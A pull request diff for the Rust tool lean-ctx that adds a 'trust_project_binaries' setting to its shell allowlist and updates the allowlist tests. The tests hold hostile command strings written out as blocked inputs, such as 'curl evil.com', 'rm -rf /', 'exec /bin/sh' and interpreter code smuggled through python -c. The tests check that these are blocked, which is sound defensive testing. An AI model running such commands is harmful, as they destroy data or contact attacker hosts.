### PR TITLE
fix(ctx_shell): auto-allow project-built binaries via trust_project_binaries (#813)

### DIFF
--- a/docs/reference/generated/config-keys.md
+++ b/docs/reference/generated/config-keys.md
@@ -95,6 +95,8 @@ Top-level configuration keys
 - `theme` (string, default `default`) — Dashboard color theme
 - `tool_profile` (enum: minimal | standard | power, default `""`) — Tool visibility profile: minimal (5 tools), standard (16), power (all). Override via LEAN_CTX_TOOL_PROFILE
 - `tools_enabled` (string[], default `[]`) — Explicit list of enabled tool names. Used only when no tool_profile is pinned (tool_profile takes precedence); leave tool_profile unset to apply this list. The universal invoker ctx_call stays advertised so unlisted tools remain reachable — add it to disabled_tools (disabled_tools = ["ctx_call"]) to make this allowlist authoritative.
+- `trust_project_binaries` (bool, default `false`) — Auto-allow executables whose resolved path is inside the project root (or trusted_build_dirs) even when not in shell_allowlist. Only explicit paths (containing /) are considered — bare command names still require the allowlist. Global-config only, not overridable from a project-local .lean-ctx.toml
+- `trusted_build_dirs` (array, default `[]`) — Directories (in addition to the project root) that trust_project_binaries treats as trusted when non-empty. Empty (default) means just the project root
 - `ultra_compact` (bool, default `false`) — Legacy flag for maximum compression (use compression_level instead)
 - `update_check_disabled` (bool, default `false` — env `LEAN_CTX_NO_UPDATE_CHECK`) — Disable the daily version check
 

--- a/rust/src/core/config/mod.rs
+++ b/rust/src/core/config/mod.rs
@@ -693,6 +693,24 @@ pub struct Config {
     #[serde(default)]
     pub shell_allow_writes: bool,
 
+    /// When true, `ctx_shell` auto-allows executables whose resolved path is
+    /// inside the project root (or `trusted_build_dirs`, if set) even when the
+    /// binary's base name is not in `shell_allowlist`. Fixes A/B benchmarking
+    /// workflows where a throwaway build (`./cbc_old`, `build/cbc_new`) would
+    /// otherwise need its own `lean-ctx allow <name>` (#813). Default false —
+    /// global-config only (not overridable from a project-local
+    /// `.lean-ctx.toml`, same as `shell_security`): a repo cannot use its own
+    /// config to trust binaries it ships. Only explicit paths (containing `/`)
+    /// are considered; a bare command name still requires the allowlist.
+    #[serde(default)]
+    pub trust_project_binaries: bool,
+
+    /// Directories (in addition to the project root) that `trust_project_binaries`
+    /// treats as trusted when non-empty. Empty (default) means "just the project
+    /// root". Only consulted when `trust_project_binaries = true`.
+    #[serde(default)]
+    pub trusted_build_dirs: Vec<String>,
+
     /// Setup behavior: controls what gets injected during setup and updates.
     #[serde(default)]
     pub setup: SetupConfig,
@@ -820,6 +838,8 @@ impl Default for Config {
             shell_timeout_secs: None,
             shell_heavy_timeout_secs: None,
             shell_allow_writes: false,
+            trust_project_binaries: false,
+            trusted_build_dirs: Vec::new(),
             setup: SetupConfig::default(),
         }
     }

--- a/rust/src/core/config/schema/sections_core.rs
+++ b/rust/src/core/config/schema/sections_core.rs
@@ -746,6 +746,22 @@ pub(super) fn build(sections: &mut BTreeMap<String, SectionSchema>) {
             "LEAN_CTX_SHELL_ALLOW_WRITES",
         ),
     );
+    root.insert(
+        "trust_project_binaries".into(),
+        key(
+            "bool",
+            serde_json::json!(false),
+            "Auto-allow executables whose resolved path is inside the project root (or trusted_build_dirs) even when not in shell_allowlist. Only explicit paths (containing /) are considered — bare command names still require the allowlist. Global-config only, not overridable from a project-local .lean-ctx.toml",
+        ),
+    );
+    root.insert(
+        "trusted_build_dirs".into(),
+        key(
+            "array",
+            serde_json::json!([]),
+            "Directories (in addition to the project root) that trust_project_binaries treats as trusted when non-empty. Empty (default) means just the project root",
+        ),
+    );
 
     sections.insert(
         "root".into(),

--- a/rust/src/core/shell_allowlist/mod.rs
+++ b/rust/src/core/shell_allowlist/mod.rs
@@ -20,10 +20,20 @@ pub use mode::ShellSecurity;
 /// - [`ShellSecurity::Warn`] → run the checks, log any violation, return `Ok`.
 /// - [`ShellSecurity::Enforce`] → block on violation (the secure default).
 pub fn check_shell_allowlist(command: &str) -> Result<(), ShellError> {
+    check_shell_allowlist_with_cwd(command, &current_process_cwd())
+}
+
+/// Same as [`check_shell_allowlist`] but resolves `trust_project_binaries`
+/// paths against an explicit `cwd` instead of this process's own working
+/// directory. MCP sessions track a *virtual* cwd (via `cd` commands run
+/// through `ctx_shell`) that can diverge from the server process's real cwd,
+/// so callers with a session-tracked cwd must use this variant for the
+/// project-root trust check to resolve relative binaries correctly (#813).
+pub fn check_shell_allowlist_with_cwd(command: &str, cwd: &str) -> Result<(), ShellError> {
     match ShellSecurity::resolve() {
         ShellSecurity::Off => Ok(()),
         ShellSecurity::Warn => {
-            if let Err(msg) = enforce_shell_allowlist(command) {
+            if let Err(msg) = enforce_shell_allowlist(command, cwd) {
                 tracing::warn!(
                     target: "shell_security",
                     "warn-only: would block ({})",
@@ -32,7 +42,7 @@ pub fn check_shell_allowlist(command: &str) -> Result<(), ShellError> {
             }
             Ok(())
         }
-        ShellSecurity::Enforce => enforce_shell_allowlist(command),
+        ShellSecurity::Enforce => enforce_shell_allowlist(command, cwd),
     }
 }
 
@@ -49,7 +59,7 @@ pub fn check_shell_allowlist(command: &str) -> Result<(), ShellError> {
 /// just as wrong as blocking it would be in `enforce`.
 #[must_use]
 pub fn passes_enforced(command: &str) -> bool {
-    enforce_shell_allowlist(command).is_ok()
+    enforce_shell_allowlist(command, &current_process_cwd()).is_ok()
 }
 
 /// Allowlist + dangerous-pattern enforcement, evaluated as if in `enforce` mode.
@@ -58,7 +68,7 @@ pub fn passes_enforced(command: &str) -> bool {
 ///
 /// When the allowlist is empty, all commands pass (blocklist-only mode).
 /// When non-empty, EVERY command segment in the pipeline must match.
-fn enforce_shell_allowlist(command: &str) -> Result<(), ShellError> {
+fn enforce_shell_allowlist(command: &str, cwd: &str) -> Result<(), ShellError> {
     let normalized = normalize_line_continuations(command);
     let cmd = normalized.as_str();
 
@@ -81,7 +91,7 @@ fn enforce_shell_allowlist(command: &str) -> Result<(), ShellError> {
         check_unconditional_blocked_only(cmd)?;
         return Ok(());
     }
-    check_all_segments(cmd, &allowlist)
+    check_all_segments(cmd, &allowlist, cwd)
 }
 
 /// Normalize the command string: remove backslash-newline continuations and
@@ -799,7 +809,7 @@ fn contains_double_semicolon(command: &str) -> bool {
     false
 }
 
-fn check_all_segments(command: &str, allowlist: &[String]) -> Result<(), ShellError> {
+fn check_all_segments(command: &str, allowlist: &[String], cwd: &str) -> Result<(), ShellError> {
     if allowlist.is_empty() {
         return Ok(());
     }
@@ -838,6 +848,9 @@ fn check_all_segments(command: &str, allowlist: &[String]) -> Result<(), ShellEr
         check_interpreter_abuse(seg, allowlist)?;
         check_dangerous_flags(seg)?;
         if !allowlist.iter().any(|a| a == &base) {
+            if is_trusted_project_binary(&extract_first_token_from_segment(seg), cwd) {
+                continue;
+            }
             // #815: for compound commands, tell the user which segment was
             // blocked and that nothing ran (the pipeline is rejected as a
             // whole before execution, so no prefix commands executed).
@@ -1056,6 +1069,68 @@ fn extract_base_from_segment(segment: &str) -> String {
         .next()
         .unwrap_or(first_token)
         .to_string()
+}
+
+/// Like [`extract_base_from_segment`] but keeps the full first token verbatim
+/// (no basename stripping), so a path like `./cbc_old` or `build/cbc_new`
+/// stays resolvable against the project root for the `trust_project_binaries`
+/// check (#813). Bare command names (no `/`) come back unchanged.
+fn extract_first_token_from_segment(segment: &str) -> String {
+    let trimmed = segment.trim();
+    if trimmed.is_empty() {
+        return String::new();
+    }
+    let cmd_part = skip_env_assignments(trimmed);
+    shell_tokenize(cmd_part).into_iter().next().unwrap_or_default()
+}
+
+/// True when `trust_project_binaries` is enabled and `first_token` resolves to
+/// an executable path inside the project root (or a `trusted_build_dirs`
+/// entry). Only explicit paths (containing `/`) are considered — a bare
+/// command name (found via PATH) still requires the allowlist, since
+/// resolving *those* against the project root would be meaningless (#813).
+fn is_trusted_project_binary(first_token: &str, cwd: &str) -> bool {
+    if !first_token.contains('/') {
+        return false;
+    }
+    let cfg = crate::core::config::Config::load();
+    if !cfg.trust_project_binaries {
+        return false;
+    }
+
+    let candidate = std::path::Path::new(first_token);
+    let absolute = if candidate.is_absolute() {
+        candidate.to_path_buf()
+    } else {
+        std::path::Path::new(cwd).join(candidate)
+    };
+    let Ok(resolved) = absolute.canonicalize() else {
+        return false;
+    };
+
+    let mut trusted_roots: Vec<std::path::PathBuf> = cfg
+        .trusted_build_dirs
+        .iter()
+        .filter_map(|d| std::path::Path::new(d).canonicalize().ok())
+        .collect();
+    if trusted_roots.is_empty()
+        && let Some(root) = crate::core::config::Config::find_project_root()
+        && let Ok(canon_root) = std::path::Path::new(&root).canonicalize()
+    {
+        trusted_roots.push(canon_root);
+    }
+
+    trusted_roots.iter().any(|root| resolved.starts_with(root))
+}
+
+/// This process's own working directory, used by [`check_shell_allowlist`] /
+/// [`passes_enforced`] callers that don't track a separate session cwd (the
+/// CLI shell entrypoints and the PreToolUse hook, where the process cwd IS
+/// the real invoking directory). MCP `ctx_shell` uses
+/// [`check_shell_allowlist_with_cwd`] instead, since its session-tracked
+/// virtual cwd can diverge from this process's real one (#813).
+fn current_process_cwd() -> String {
+    std::env::current_dir().map_or_else(|_| ".".to_string(), |p| p.display().to_string())
 }
 
 /// Skip leading KEY=VALUE environment variable assignments.

--- a/rust/src/core/shell_allowlist/tests.rs
+++ b/rust/src/core/shell_allowlist/tests.rs
@@ -58,13 +58,13 @@ fn allow(cmds: &[&str]) -> Vec<String> {
 
 #[test]
 fn allowlist_empty_always_passes() {
-    assert!(check_all_segments("anything", &[]).is_ok());
+    assert!(check_all_segments("anything", &[], ".").is_ok());
 }
 
 #[test]
 fn allowlist_blocks_unlisted() {
     let list = allow(&["git", "cargo"]);
-    let result = check_all_segments("npm install", &list);
+    let result = check_all_segments("npm install", &list, ".");
     assert!(result.is_err());
     assert!(result.unwrap_err().contains("npm"));
 }
@@ -76,7 +76,7 @@ fn allowlist_blocks_unlisted() {
 #[test]
 fn escaped_pipe_in_pattern_is_one_command() {
     let list = allow(&["rg"]);
-    assert!(check_all_segments(r"rg -n split\.label\|quantityLabel src/", &list).is_ok());
+    assert!(check_all_segments(r"rg -n split\.label\|quantityLabel src/", &list, ".").is_ok());
 }
 
 #[test]
@@ -85,26 +85,26 @@ fn escaped_semicolon_is_data() {
     // An escaped semicolon inside a regex pattern is data, not a separator —
     // the old scanner split here and blocked `bar` as an unknown command.
     // (`find -exec … \;` stays blocked separately via check_dangerous_flags.)
-    assert!(check_all_segments(r"rg foo\;bar src/", &list).is_ok());
+    assert!(check_all_segments(r"rg foo\;bar src/", &list, ".").is_ok());
 }
 
 #[test]
 fn escaped_ampersand_is_data() {
     let list = allow(&["rg"]);
-    assert!(check_all_segments(r"rg foo\&bar src/", &list).is_ok());
+    assert!(check_all_segments(r"rg foo\&bar src/", &list, ".").is_ok());
 }
 
 #[test]
 fn escaped_parens_in_pattern_keep_segment_intact() {
     let list = allow(&["rg"]);
-    assert!(check_all_segments(r"rg foo\(bar\|baz\) src/", &list).is_ok());
+    assert!(check_all_segments(r"rg foo\(bar\|baz\) src/", &list, ".").is_ok());
 }
 
 #[test]
 fn real_pipe_still_splits_after_escape_fix() {
     let list = allow(&["rg"]);
     // head is NOT allowlisted — a real pipe must still be validated per segment
-    let result = check_all_segments(r"rg -n split\.label src/ | head -5", &list);
+    let result = check_all_segments(r"rg -n split\.label src/ | head -5", &list, ".");
     assert!(result.is_err());
     assert!(result.unwrap_err().contains("head"));
 }
@@ -112,7 +112,7 @@ fn real_pipe_still_splits_after_escape_fix() {
 #[test]
 fn escaped_pipe_then_real_pipe_splits_correctly() {
     let list = allow(&["rg", "head"]);
-    assert!(check_all_segments(r"rg -n foo\|bar src/ | head -5", &list).is_ok());
+    assert!(check_all_segments(r"rg -n foo\|bar src/ | head -5", &list, ".").is_ok());
 }
 
 #[test]
@@ -130,34 +130,34 @@ fn escaped_dollar_paren_is_not_substitution() {
 #[test]
 fn trailing_backslash_does_not_panic_or_hang() {
     let list = allow(&["rg"]);
-    let _ = check_all_segments("rg foo\\", &list);
+    let _ = check_all_segments("rg foo\\", &list, ".");
     let _ = has_expanding_substitution_in_args("rg foo\\");
 }
 
 #[test]
 fn allowlist_allows_listed() {
     let list = allow(&["git", "cargo", "npm"]);
-    assert!(check_all_segments("git status", &list).is_ok());
-    assert!(check_all_segments("cargo test --release", &list).is_ok());
-    assert!(check_all_segments("npm run build", &list).is_ok());
+    assert!(check_all_segments("git status", &list, ".").is_ok());
+    assert!(check_all_segments("cargo test --release", &list, ".").is_ok());
+    assert!(check_all_segments("npm run build", &list, ".").is_ok());
 }
 
 #[test]
 fn allowlist_allows_full_path() {
     let list = allow(&["git"]);
-    assert!(check_all_segments("/usr/bin/git status", &list).is_ok());
+    assert!(check_all_segments("/usr/bin/git status", &list, ".").is_ok());
 }
 
 #[test]
 fn allowlist_allows_with_env_prefix() {
     let list = allow(&["git"]);
-    assert!(check_all_segments("LANG=C git log", &list).is_ok());
+    assert!(check_all_segments("LANG=C git log", &list, ".").is_ok());
 }
 
 #[test]
 fn allowlist_blocks_similar_names() {
     let list = allow(&["git"]);
-    assert!(check_all_segments("gitk --all", &list).is_err());
+    assert!(check_all_segments("gitk --all", &list, ".").is_err());
 }
 
 // --- Multi-segment validation (the critical security improvement) ---
@@ -166,36 +166,36 @@ fn allowlist_blocks_similar_names() {
 fn all_segments_must_be_allowed_chain() {
     let list = allow(&["git", "cargo"]);
     // Both allowed → ok
-    assert!(check_all_segments("git status && cargo test", &list).is_ok());
+    assert!(check_all_segments("git status && cargo test", &list, ".").is_ok());
     // Second not allowed → block
-    assert!(check_all_segments("git status && rm -rf /", &list).is_err());
+    assert!(check_all_segments("git status && rm -rf /", &list, ".").is_err());
 }
 
 #[test]
 fn all_segments_must_be_allowed_pipe() {
     let list = allow(&["git", "grep", "wc"]);
-    assert!(check_all_segments("git log | grep fix | wc -l", &list).is_ok());
+    assert!(check_all_segments("git log | grep fix | wc -l", &list, ".").is_ok());
     // cat not allowed
-    assert!(check_all_segments("git log | cat", &list).is_err());
+    assert!(check_all_segments("git log | cat", &list, ".").is_err());
 }
 
 #[test]
 fn all_segments_must_be_allowed_semicolon() {
     let list = allow(&["echo", "ls"]);
-    assert!(check_all_segments("echo hello; ls -la", &list).is_ok());
-    assert!(check_all_segments("echo hello; rm -rf /", &list).is_err());
+    assert!(check_all_segments("echo hello; ls -la", &list, ".").is_ok());
+    assert!(check_all_segments("echo hello; rm -rf /", &list, ".").is_err());
 }
 
 #[test]
 fn redirect_2to1_not_treated_as_command() {
     // #334: `2>&1` must not be parsed as a standalone command `1`.
     let list = allow(&["pnpm", "echo"]);
-    assert!(check_all_segments("pnpm run compile 2>&1", &list).is_ok());
-    assert!(check_all_segments("pnpm run build 2>&1 && echo done", &list).is_ok());
+    assert!(check_all_segments("pnpm run compile 2>&1", &list, ".").is_ok());
+    assert!(check_all_segments("pnpm run build 2>&1 && echo done", &list, ".").is_ok());
     // #384: exact reporter repros (3.6.26 predates the #334 fix) — pinned
     // through the full entry point, not just the segment splitter.
-    assert!(check_all_segments("echo test 2>&1", &list).is_ok());
-    assert!(check_all_segments("echo test 1>&2", &list).is_ok());
+    assert!(check_all_segments("echo test 2>&1", &list, ".").is_ok());
+    assert!(check_all_segments("echo test 1>&2", &list, ".").is_ok());
     assert_eq!(split_on_operators("echo test 2>&1").len(), 1);
     assert_eq!(split_on_operators("echo test 1>&2").len(), 1);
 }
@@ -203,10 +203,10 @@ fn redirect_2to1_not_treated_as_command() {
 #[test]
 fn redirect_ampersand_forms_not_separators() {
     let list = allow(&["cmd"]);
-    assert!(check_all_segments("cmd >&2", &list).is_ok()); // >&fd
-    assert!(check_all_segments("cmd 1>&2", &list).is_ok()); // N>&M
-    assert!(check_all_segments("cmd &>out.log", &list).is_ok()); // &>file
-    assert!(check_all_segments("cmd &>>out.log", &list).is_ok()); // &>>file
+    assert!(check_all_segments("cmd >&2", &list, ".").is_ok()); // >&fd
+    assert!(check_all_segments("cmd 1>&2", &list, ".").is_ok()); // N>&M
+    assert!(check_all_segments("cmd &>out.log", &list, ".").is_ok()); // &>file
+    assert!(check_all_segments("cmd &>>out.log", &list, ".").is_ok()); // &>>file
     // The redirect must not leak the fd/target as a new segment.
     assert_eq!(split_on_operators("pnpm run compile 2>&1").len(), 1);
     assert_eq!(split_on_operators("cmd &>out.log").len(), 1);
@@ -217,36 +217,36 @@ fn noclobber_redirect_not_a_pipe() {
     // #387: `>|` (noclobber redirect) must not split as a pipe — the target
     // is a file path, not a command to allowlist.
     let list = allow(&["date", "cmd"]);
-    assert!(check_all_segments("date >| out", &list).is_ok());
-    assert!(check_all_segments("cmd >>out", &list).is_ok());
-    assert!(check_all_segments("cmd > out", &list).is_ok());
+    assert!(check_all_segments("date >| out", &list, ".").is_ok());
+    assert!(check_all_segments("cmd >>out", &list, ".").is_ok());
+    assert!(check_all_segments("cmd > out", &list, ".").is_ok());
     // Exact reporter repros (both spellings of the fd-dup).
-    assert!(check_all_segments("date --fsdfs >| out 2>&1", &list).is_ok());
-    assert!(check_all_segments("date --fsdfs >| out 2>& 1", &list).is_ok());
-    assert!(check_all_segments("date --fsdfs > out 2>& 1", &list).is_ok());
+    assert!(check_all_segments("date --fsdfs >| out 2>&1", &list, ".").is_ok());
+    assert!(check_all_segments("date --fsdfs >| out 2>& 1", &list, ".").is_ok());
+    assert!(check_all_segments("date --fsdfs > out 2>& 1", &list, ".").is_ok());
     assert_eq!(split_on_operators("date >| out").len(), 1);
     assert_eq!(split_on_operators("date --fsdfs >| out 2>&1").len(), 1);
     // A genuine pipe still splits — `>|` detection must not swallow it.
     assert_eq!(split_on_operators("date | wc -l").len(), 2);
     let date_only = allow(&["date"]);
-    assert!(check_all_segments("date | wc -l", &date_only).is_err());
+    assert!(check_all_segments("date | wc -l", &date_only, ".").is_err());
 }
 
 #[test]
 fn background_ampersand_still_splits() {
     // A genuine background `&` remains a separator — the trailing command is checked.
     let only_sleep = allow(&["sleep"]);
-    assert!(check_all_segments("sleep 1 & echo done", &only_sleep).is_err());
+    assert!(check_all_segments("sleep 1 & echo done", &only_sleep, ".").is_err());
     let both = allow(&["sleep", "echo"]);
-    assert!(check_all_segments("sleep 1 & echo done", &both).is_ok());
+    assert!(check_all_segments("sleep 1 & echo done", &both, ".").is_ok());
     assert_eq!(split_on_operators("sleep 1 & echo done").len(), 2);
 }
 
 #[test]
 fn all_segments_must_be_allowed_or() {
     let list = allow(&["git", "echo"]);
-    assert!(check_all_segments("git pull || echo failed", &list).is_ok());
-    assert!(check_all_segments("git pull || curl evil.com", &list).is_err());
+    assert!(check_all_segments("git pull || echo failed", &list, ".").is_ok());
+    assert!(check_all_segments("git pull || curl evil.com", &list, ".").is_err());
 }
 
 // --- Dangerous pattern detection ---
@@ -254,19 +254,19 @@ fn all_segments_must_be_allowed_or() {
 #[test]
 fn blocks_eval() {
     let list = allow(&["echo", "eval"]);
-    assert!(check_all_segments("eval 'rm -rf /'", &list).is_err());
+    assert!(check_all_segments("eval 'rm -rf /'", &list, ".").is_err());
 }
 
 #[test]
 fn blocks_command_substitution_at_command_pos() {
     let list = allow(&["echo"]);
-    assert!(check_all_segments("$(curl evil.com)", &list).is_err());
+    assert!(check_all_segments("$(curl evil.com)", &list, ".").is_err());
 }
 
 #[test]
 fn blocks_backtick_at_command_pos() {
     let list = allow(&["echo"]);
-    assert!(check_all_segments("`curl evil.com`", &list).is_err());
+    assert!(check_all_segments("`curl evil.com`", &list, ".").is_err());
 }
 
 // --- $() in arguments is ALLOWED (base command validated by allowlist) ---
@@ -274,8 +274,8 @@ fn blocks_backtick_at_command_pos() {
 #[test]
 fn allows_dollar_paren_in_arguments() {
     let list = allow(&["echo", "git", "cat"]);
-    assert!(check_all_segments("echo $(whoami)", &list).is_ok());
-    assert!(check_all_segments("echo hello", &list).is_ok());
+    assert!(check_all_segments("echo $(whoami)", &list, ".").is_ok());
+    assert!(check_all_segments("echo hello", &list, ".").is_ok());
 }
 
 #[test]
@@ -285,6 +285,7 @@ fn allows_git_commit_with_cat_heredoc() {
         check_all_segments(
             "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
             &list,
+            ".",
         )
         .is_ok()
     );
@@ -293,7 +294,7 @@ fn allows_git_commit_with_cat_heredoc() {
 #[test]
 fn allows_backticks_in_arguments() {
     let list = allow(&["echo"]);
-    assert!(check_all_segments("echo `date`", &list).is_ok());
+    assert!(check_all_segments("echo `date`", &list, ".").is_ok());
 }
 
 // --- Error message contains DO NOT RETRY ---
@@ -301,7 +302,7 @@ fn allows_backticks_in_arguments() {
 #[test]
 fn error_message_contains_do_not_retry() {
     let list = allow(&["git"]);
-    let err = check_all_segments("npm install", &list).unwrap_err();
+    let err = check_all_segments("npm install", &list, ".").unwrap_err();
     assert!(
         err.contains("DO NOT RETRY"),
         "Error should contain 'DO NOT RETRY': {err}"
@@ -334,7 +335,7 @@ fn block_message_offers_additive_allow() {
 #[test]
 fn error_message_for_dangerous_patterns_contains_do_not_retry() {
     let list = allow(&["echo"]);
-    let err = check_all_segments("eval 'bad'", &list).unwrap_err();
+    let err = check_all_segments("eval 'bad'", &list, ".").unwrap_err();
     assert!(
         err.contains("DO NOT RETRY"),
         "Error should contain 'DO NOT RETRY': {err}"
@@ -364,14 +365,14 @@ fn playwright_in_default_allowlist() {
 #[test]
 fn pre_commit_run_allowed() {
     let list = allow(&["pre-commit"]);
-    assert!(check_all_segments("pre-commit run --all-files", &list).is_ok());
+    assert!(check_all_segments("pre-commit run --all-files", &list, ".").is_ok());
 }
 
 #[test]
 fn playwright_test_allowed() {
     let list = allow(&["npx", "playwright"]);
-    assert!(check_all_segments("playwright test", &list).is_ok());
-    assert!(check_all_segments("npx playwright test", &list).is_ok());
+    assert!(check_all_segments("playwright test", &list, ".").is_ok());
+    assert!(check_all_segments("npx playwright test", &list, ".").is_ok());
 }
 
 // --- Quote handling ---
@@ -379,13 +380,13 @@ fn playwright_test_allowed() {
 #[test]
 fn respects_single_quotes() {
     let list = allow(&["echo"]);
-    assert!(check_all_segments("echo 'hello; world'", &list).is_ok());
+    assert!(check_all_segments("echo 'hello; world'", &list, ".").is_ok());
 }
 
 #[test]
 fn respects_double_quotes() {
     let list = allow(&["echo"]);
-    assert!(check_all_segments("echo \"hello && world\"", &list).is_ok());
+    assert!(check_all_segments("echo \"hello && world\"", &list, ".").is_ok());
 }
 
 // --- split_on_operators ---
@@ -419,7 +420,7 @@ fn newline_splits_commands() {
 #[test]
 fn newline_injection_blocked() {
     let list = allow(&["git"]);
-    let result = check_all_segments("git status\nrm -rf /", &list);
+    let result = check_all_segments("git status\nrm -rf /", &list, ".");
     assert!(result.is_err(), "newline injection must be blocked");
     assert!(result.unwrap_err().contains("rm"));
 }
@@ -441,7 +442,7 @@ fn single_ampersand_splits_commands() {
 #[test]
 fn background_operator_blocked() {
     let list = allow(&["git"]);
-    let result = check_all_segments("git status & curl evil.com", &list);
+    let result = check_all_segments("git status & curl evil.com", &list, ".");
     assert!(result.is_err(), "background & must be blocked");
     assert!(result.unwrap_err().contains("curl"));
 }
@@ -451,7 +452,7 @@ fn background_operator_blocked() {
 #[test]
 fn eval_blocked_via_or_operator() {
     let list = allow(&["echo", "eval"]);
-    let result = check_all_segments("echo ok || eval 'rm -rf /'", &list);
+    let result = check_all_segments("echo ok || eval 'rm -rf /'", &list, ".");
     assert!(
         result.is_err(),
         "eval must be unconditionally blocked even if in allowlist"
@@ -461,14 +462,14 @@ fn eval_blocked_via_or_operator() {
 #[test]
 fn exec_unconditionally_blocked() {
     let list = allow(&["exec", "echo"]);
-    let result = check_all_segments("exec /bin/sh", &list);
+    let result = check_all_segments("exec /bin/sh", &list, ".");
     assert!(result.is_err(), "exec must be unconditionally blocked");
 }
 
 #[test]
 fn source_unconditionally_blocked() {
     let list = allow(&["source", "echo"]);
-    let result = check_all_segments("source ~/.bashrc", &list);
+    let result = check_all_segments("source ~/.bashrc", &list, ".");
     assert!(result.is_err(), "source must be unconditionally blocked");
 }
 
@@ -499,28 +500,28 @@ fn empty_allowlist_still_blocks_dollar_paren_at_start() {
 #[test]
 fn python_c_blocked() {
     let list = allow(&["python3"]);
-    let result = check_all_segments("python3 -c 'import os; os.system(\"id\")'", &list);
+    let result = check_all_segments("python3 -c 'import os; os.system(\"id\")'", &list, ".");
     assert!(result.is_err(), "python3 -c must be blocked");
 }
 
 #[test]
 fn node_e_blocked() {
     let list = allow(&["node"]);
-    let result = check_all_segments("node -e 'process.exit(1)'", &list);
+    let result = check_all_segments("node -e 'process.exit(1)'", &list, ".");
     assert!(result.is_err(), "node -e must be blocked");
 }
 
 #[test]
 fn python_script_allowed() {
     let list = allow(&["python3"]);
-    let result = check_all_segments("python3 script.py", &list);
+    let result = check_all_segments("python3 script.py", &list, ".");
     assert!(result.is_ok(), "python3 with script file must be allowed");
 }
 
 #[test]
 fn env_delegates_to_unlisted_blocked() {
     let list = allow(&["env", "git"]);
-    let result = check_all_segments("env /bin/sh -c 'id'", &list);
+    let result = check_all_segments("env /bin/sh -c 'id'", &list, ".");
     assert!(
         result.is_err(),
         "env delegating to unlisted command must be blocked"
@@ -577,9 +578,9 @@ fn gh391_delegation_wrappers_cannot_smuggle_inline_code() {
 #[test]
 fn gh391_xargs_delegation_respects_allowlist() {
     let list = allow(&["find", "xargs", "wc", "git"]);
-    assert!(check_all_segments("find . -name '*.rs' | xargs wc -l", &list).is_ok());
-    assert!(check_all_segments("xargs -n 1 git fetch", &list).is_ok());
-    let blocked = check_all_segments("find . -name '*.sh' | xargs rm", &list);
+    assert!(check_all_segments("find . -name '*.rs' | xargs wc -l", &list, ".").is_ok());
+    assert!(check_all_segments("xargs -n 1 git fetch", &list, ".").is_ok());
+    let blocked = check_all_segments("find . -name '*.sh' | xargs rm", &list, ".");
     assert!(
         blocked.is_err(),
         "xargs delegating to unlisted rm must be blocked"
@@ -619,7 +620,7 @@ fn gh391_strict_mode_blocks_pipe_to_bare_interpreter() {
 #[test]
 fn env_delegates_to_listed_allowed() {
     let list = allow(&["env", "git"]);
-    let result = check_all_segments("env git status", &list);
+    let result = check_all_segments("env git status", &list, ".");
     assert!(
         result.is_ok(),
         "env delegating to listed command must be allowed"
@@ -639,7 +640,7 @@ fn env_override_is_additive() {
 #[test]
 fn dot_source_alias_blocked() {
     let list = allow(&["echo"]);
-    let result = check_all_segments(". ~/.bashrc", &list);
+    let result = check_all_segments(". ~/.bashrc", &list, ".");
     assert!(result.is_err(), ". (source alias) must be blocked");
 }
 
@@ -659,7 +660,7 @@ fn backslash_newline_normalized() {
 #[test]
 fn delegation_recursive_interpreter_check() {
     let list = allow(&["env", "python3"]);
-    let result = check_all_segments("env python3 -c 'import os'", &list);
+    let result = check_all_segments("env python3 -c 'import os'", &list, ".");
     assert!(
         result.is_err(),
         "env python3 -c must be blocked via recursive check"
@@ -669,42 +670,42 @@ fn delegation_recursive_interpreter_check() {
 #[test]
 fn delegation_recursive_normal_allowed() {
     let list = allow(&["env", "git"]);
-    let result = check_all_segments("env git status", &list);
+    let result = check_all_segments("env git status", &list, ".");
     assert!(result.is_ok(), "env git status must be allowed");
 }
 
 #[test]
 fn eval_flags_extended_r() {
     let list = allow(&["php"]);
-    let result = check_all_segments("php -r 'system(\"id\")'", &list);
+    let result = check_all_segments("php -r 'system(\"id\")'", &list, ".");
     assert!(result.is_err(), "php -r must be blocked");
 }
 
 #[test]
 fn eval_flags_extended_p() {
     let list = allow(&["node"]);
-    let result = check_all_segments("node -p 'process.exit(1)'", &list);
+    let result = check_all_segments("node -p 'process.exit(1)'", &list, ".");
     assert!(result.is_err(), "node -p must be blocked");
 }
 
 #[test]
 fn combined_flags_pe_blocked() {
     let list = allow(&["perl"]);
-    let result = check_all_segments("perl -pe 's/foo/bar/'", &list);
+    let result = check_all_segments("perl -pe 's/foo/bar/'", &list, ".");
     assert!(result.is_err(), "perl -pe must be blocked (combined flag)");
 }
 
 #[test]
 fn combined_flags_ne_blocked() {
     let list = allow(&["perl"]);
-    let result = check_all_segments("perl -ne 'print'", &list);
+    let result = check_all_segments("perl -ne 'print'", &list, ".");
     assert!(result.is_err(), "perl -ne must be blocked (combined flag)");
 }
 
 #[test]
 fn heredoc_to_interpreter_blocked() {
     let list = allow(&["python3"]);
-    let result = check_all_segments("python3 <<'EOF'", &list);
+    let result = check_all_segments("python3 <<'EOF'", &list, ".");
     assert!(result.is_err(), "heredoc to interpreter must be blocked");
 }
 
@@ -713,7 +714,7 @@ fn heredoc_to_interpreter_blocked() {
 #[test]
 fn heredoc_block_message_names_the_workaround() {
     let list = allow(&["python3"]);
-    let err = check_all_segments("python3 - <<'PY'", &list).unwrap_err();
+    let err = check_all_segments("python3 - <<'PY'", &list, ".").unwrap_err();
     assert!(err.contains("[BLOCKED — DO NOT RETRY]"), "got: {err}");
     assert!(
         err.contains("python3 /tmp/snippet"),
@@ -728,8 +729,8 @@ fn heredoc_block_message_names_the_workaround() {
 #[test]
 fn python_script_file_still_allowed() {
     let list = allow(&["python3"]);
-    assert!(check_all_segments("python3 script.py", &list).is_ok());
-    assert!(check_all_segments("python3 -u script.py", &list).is_ok());
+    assert!(check_all_segments("python3 script.py", &list, ".").is_ok());
+    assert!(check_all_segments("python3 -u script.py", &list, ".").is_ok());
 }
 
 #[test]
@@ -746,7 +747,7 @@ fn bare_interpreter_detection() {
 fn dollar_paren_in_args_passes_by_default() {
     let list = allow(&["echo", "git", "cat"]);
     assert!(
-        check_all_segments("echo $(whoami)", &list).is_ok(),
+        check_all_segments("echo $(whoami)", &list, ".").is_ok(),
         "$() in args must still pass when shell_strict_mode=false (default)"
     );
 }
@@ -755,7 +756,7 @@ fn dollar_paren_in_args_passes_by_default() {
 fn backticks_in_args_passes_by_default() {
     let list = allow(&["echo"]);
     assert!(
-        check_all_segments("echo `date`", &list).is_ok(),
